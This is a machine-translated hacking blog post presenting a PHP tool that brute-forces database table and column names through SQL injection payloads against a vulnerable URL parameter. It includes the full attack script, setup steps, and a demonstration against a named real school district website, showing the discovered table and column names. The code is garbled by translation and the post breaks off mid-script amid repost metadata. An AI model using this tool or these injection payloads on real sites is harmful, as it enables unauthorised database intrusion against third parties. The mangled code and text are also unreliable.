Article author: mika[est]
Information Source: Evil Octal Information Security team
Recently I have a crush on the script, hehe ~ ~ ~ just finished PHP and then read some PHP security articles, so from Google to find a few stations to practice.
The result found PHP guess table name and column name is really laborious ah, nbsi this kind of scanning tool has the kind of dictionary or brute force to guess the table name and column name function, difficult not to have a guess? I'm a lazy:-).
Suddenly think that you have not just finished learning PHP? Why not apply it? PHP is not only a web scripting language, it is also a very good command line interpretation of the language, it is easy to write a script well. In order to be able to run into such problems later, I wrote a PHP script to guess the table and column names. The script is very simple and reads as follows:
echo "Universal Database tables explode exploit V0.1";
echo "written by Mika[est]";
$keyword = "Warning";
$keyword = "Error";
Switch ($ARGC) {
Case 3:
$u = "and (select COUNT (*) from Mika_name) >0";
$dic = $ARGV [2];
Break
Case 4:
$u = "and 1=1 Union Select". Implode (,, range (1, $argv [2])). "From mika_name#";
$dic = $ARGV [3];
Break
Case 5:
if ($argv [2]!= "-T")
Exit ("Arguments Error");
$u = "and (select COUNT (mika_name) from $ARGV [3]) >0#";
$dic = $ARGV [4];
Break
Case 6:
if ($argv [2]!= "-T" | | $argv [4]<1]
Exit ("Arguments Error");
if ($argv [4]>=2) {
$u = "and 1=1 Union select". Mika_name.,.implode (,, Range (2, $argv [4])). "From $argv [3]#";
}else{
$u = "and 1=1 Union select Mika_name from $ARGV [3]#";
}
$dic = $argv [5];
Break
Default
Echo << <>
Usage: $argv [0] [OPTIONS]
Options:number--->to indicate column number of a table during a union query
e.g: $ARGV [0] [Url]http://www.aaa.com/bbb.asp?ccc=56[/url] 3 Mydict.txt
The URL would be like:.../bbb.asp?ccc=56 and 1=2 Union select in the From admin
OPTIONS:-T
[NUMBER]---> To explode column name of the
e.g: $ARGV [0] [Url]http://www.aaa.com/bbb.asp?ccc=56[/url]-t admin mydict.txt
Attention:if dont use [options] The program would use default mode to Work.you can change it in the source code of this Program.
USAGE;
Die
}
$old = $argv [1];
File_exists ($dic) or exit ("dic file does not exist!");
$words =file ($dic);
$curl =curl_init ();
curl_setopt ($curl, curlopt_header,0);
curl_setopt ($curl, curlopt_returntransfer,1);
curl_setopt ($curl, Curlopt_proxy, "127.0.0.1:8080");
print "[+]searching what Want ...";
foreach ($words as $word) {
Print $word;
if (Preg_match ("/^s$/", $word)) {
print "blank";
Continue
}
$url =str_replace (Mika_name,trim ($word), $u);
$url = $old. UrlEncode ($url);
$url = $old. $url;
curl_setopt ($curl, Curlopt_url, $url);
Print "Source URL is:". $url. "";
$content =curl_exec ($curl);
$new = $content;
Print $content;
if (Preg_match ("/$keyword/I", $content) ==0) {
Print "[*] FOUND:". Trim ($word);
}
Else{print ".";}
}
?>
Let me explain: the module used in the program is curl, it is very convenient to get the content of the Web page. My PHP is for windows, so there are a lot of modules integrated. But Curl is not enabled by default and you need to turn it on. The method is simple, to download the latest version of the green version of PHP (no need to install, easy to carry), Then copy the php.ini-recommended in the compressed package to the system directory (Win2K is the Winnt directory, XP, etc.) and rename it to PHP.ini, then open it with Notepad and find the following line:
Extension_dir =
Set its value to your own, such as compressing the package into the c:php, then you need to set it to:
Extension_dir = "C:phpext"
And then continue to find the following paragraph:
; Windows Extensions
; Note that ODBC support is built in, and so no DLLs are needed for it.
; Note that many DLL files is located in the extensions/(PHP 4) ext/(PHP 5)
; Extension folders as well as the separate PECL DLL download (PHP 5).
; Be sure to appropriately set the EXTENSION_DIR directive.
; Extension=php_mbstring.dll
; Extension=php_bz2.dll
; Extension=php_curl.dll
; Extension=php_dba.dll
; Extension=php_dbase.dll
; Extension=php_exif.dll
; Extension=php_fdf.dll
; Extension=php_filepro.dll
; Extension=php_gd2.dll
; Extension=php_gettext.dll
; Extension=php_ifx.dll
Have you seen Php_curl.dll? Remove the semicolon in front of it. Then save it, not yet, and then go to the PHP directory to find the two files:
Libeay32.dll
Ssleay32.dll
Copy them to the System32 directory and it's OK. Very simple, huh? Then set your PHP path in the environment variable so that you can call Php.exe directly in any directory to parse it. The steps to install the other modules are similar, I will not say more:-)
To get to the point, you can use the Curl module in a few steps above. The program usage is simple, for example, there is an injected URL like this: http://www.aaa.com/bbb.asp?ccc=56, your dictionary file in the current directory mydict.txt. Then the method of use of this program is:
PHP explode.php http://www.aaa.com/bbb.asp?ccc=56 mydict.txt
It is important to note that the program does not consider a lot of things because it is a program that I use myself. The program is based on the content returned by the page to judge, so, you have to first manually get it, such as you can:
Http://www.aaa.com/bbb.asp?ccc=56 and (select COUNT (*) from mika520) >0 (on Access and MSSQL)
Or
HTTP://WWW.AAA.COM/BBB.ASP?CCC=56 and 1=1 Union select 1,2,3,4,5,6 from mika520%23 (on MySQL)
The mika520 is a non-existent table, so you can look at the source code after the return of the page, just find a correct page in the non-existent statement as the keyword (NBSI, etc., the injection tool by default is the correct page of things as a judgment, I and it to:-), and then the program code in the 4th line of $ The value of keyword is changed to your keyword. For example, the following station:
http://www.elkhart.k12.in.us/content.php?id=157
Because it is PHP, you have to use the second way to guess, that is, the need for a joint query, so first to determine the injection point exists, and then use order by the number of fields, I judge here is 5 fields, I can use this program to guess, the result is as follows:
f:scriptsphpmine>php forcetb1.php Http://www.elkhart.k12.in.us/content.php?id
=157 5 Mydict.txt
Universal Database tables Explode exploit V0.1
Written by Mika[est]
[+] Searching what do you want ...
... [*] Found:structure ... ..... ..... .... ..... ..... .... ............................
Did you see it? Found a table, hehe. Take a look at the fields:
f:scriptsphpmine>php forcetb1.php Http://www.elkhart.k12.in.us/content.php?id
=157-T Structure 5 Temp.txt
Universal Database tables Explode exploit V0.1
Written by Mika[est]
[+] Searching what do you want ...
[*] Found:division ... [*] Found:id. [*] Found:level ..... [*] Found:title ....
.. [*] Found:content. [*] found:parent_id .....
Very simple, huh? The 5 in the command is the number of fields you can guess with the order by, which is the actual one. If it's a database of access or MSSQL, just remove the argument for that field number (that is, 5 in the example). I'm not going to do more demos.
If you have problems with the process, you can change the code, very simple:-)
In addition, I use this program by default HTTP proxy, so you need to modify this line:
curl_setopt ($curl, Curlopt_proxy, "127.0.0.1:8080");
If you don't need a proxy, just comment it out.
In fact, the key is to see if your dictionary is strong enough, you can combine your common dictionary a bit better. such as the NBSI and the Ghost of the dictionary to take over, and then form a file just. But these two dictionaries may have a lot of repetition, in order to save unnecessary guessing, need to place duplicates. I wrote a very simple program here in PHP to help you remove duplicate lines, as follows:
http://www.bkjia.com/PHPjc/532405.html www.bkjia.com true http://www.bkjia.com/PHPjc/532405.html techarticle article author: mika[est] Information Source: Evil Octal Information Security team recently I have a crush on the script, hehe ~ ~ ~ just finished PHP and then read some PHP security articles, so ...
if ($ARGC!=2) {
Echo <<<>
Writte